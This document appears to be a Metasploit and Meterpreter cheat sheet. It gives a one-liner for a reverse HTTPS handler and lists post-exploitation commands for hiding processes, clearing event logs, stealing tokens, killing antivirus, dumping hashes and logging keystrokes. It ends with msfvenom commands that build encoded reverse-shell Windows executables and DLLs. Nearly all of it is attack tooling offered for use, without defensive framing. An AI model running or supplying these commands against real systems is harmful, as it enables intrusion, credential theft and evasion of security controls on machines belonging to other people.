You can run msfconsole without any hassle and just one liner!
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 192.168.1.1; set LPORT 443; run"Run meterpreter session in background mode.
sessions -l
sessions -i ${session id}System commands for meterpreter
sysinfo provides system information
getuid provides username and its current processes
kill ${id} kills the specified proccess
ps list all running processess
shell spawns shell
execute -f ${file} [Options]
-H creates the process hidden from view
-a is as an argument
-i is interact with it after
-m is execute from memory
-t is execute with impersonated token
clearav securely removes event logs
steal_token attempts to steal impersonation token
Networking
Some networking commands are portfwd and route and ipconfig
Additional functionalities
Add meterpreter additional functionalities
- espia : Desktop Spying and screenshots
- incognito : User Impersonations
- priv : dumping hash of the filesystem
- sniffer : networking traffic sniffing
modules
Run metasploit modules meterpreter run ${script}
- checkvm
- killav
- credcollect
- metsvc
- get_local_subnets
- migrate
- getcountermeasure
- netenum
- getgui
- prefetchtool
- gettelnet
- hashdump
- scheduleme
- keylogrecorder
- winenum
- vnc_oneport/vnc
Reference
Huge thanks to blueliv.com
https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf
# exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -a x86 --platform windows -e x86/shikata_ga_nai -i 4 --smallest > 32bit_shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -a x64 --platform windows -e x64/zutto_dekiru -i 2 > 64bit_shell.exe
# dll
msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=127.0.0.1 LPORT=4444 > reverse_32bit.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=127.0.0.1 LPORT=4444 > reverse_64bit.dll